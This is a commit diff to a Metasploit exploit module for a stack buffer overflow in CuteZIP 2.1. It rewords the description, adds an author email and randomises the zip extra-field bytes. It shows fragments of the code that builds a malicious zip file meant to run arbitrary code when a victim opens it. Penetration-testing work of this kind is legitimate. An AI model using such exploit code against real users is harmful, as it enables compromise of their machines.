Changes proposed by todb: description, author email, zip data random

2012-08-14 18:45:05 +02:00 · 2012-08-14 18:45:05 +02:00 · 1ec7f03352
parent 3c79509780
commit 1ec7f03352
1 changed files with 7 additions and 8 deletions
--- a/modules/exploits/windows/fileformat/cutezip_bof.rb
+++ b/modules/exploits/windows/fileformat/cutezip_bof.rb
@ -22,15 +22,15 @@ class Metasploit3 < Msf::Exploit::Remote
 					This module exploits a stack-based buffer overflow vulnerability in version 2.1
 				of CuteZIP.

-				In order for the command to be executed, an attacker must convince someone to open
-				a specially crafted zip file with CuteZIP. By doing so, an attacker can execute
-				arbitrary code as the victim user.
+				In order for the command to be executed, an attacker must convince the target user
+				to open a specially crafted zip file with CuteZIP. By doing so, an attacker can
+				execute arbitrary code as the target user.
 			},
 			'License'        => MSF_LICENSE,
 			'Author'         =>
 				[
-					'C4SS!0 G0M3S', # Initial discovery, poc
-					'juan vazquez'  # Metasploit
+					'C4SS!0 G0M3S <Louredo_[at]hotmail.com>', # Initial discovery, poc
+					'juan vazquez' # Metasploit
 				],
 			'References'     =>
 				[
@ -89,9 +89,8 @@ class Metasploit3 < Msf::Exploit::Remote

 		# Create the file
 		zip = Rex::Zip::Archive.new
-		xtra = [0xdac0ffee].pack('V')
-		comment = [0xbadc0ded].pack('V')
-		zip.add_file(crafted_file, xtra, comment)
+		xtra = rand_text(4)
+		zip.add_file(crafted_file, xtra)

 		print_status("Creating '#{datastore['FILENAME']}' file...")
 		file_create(zip.pack)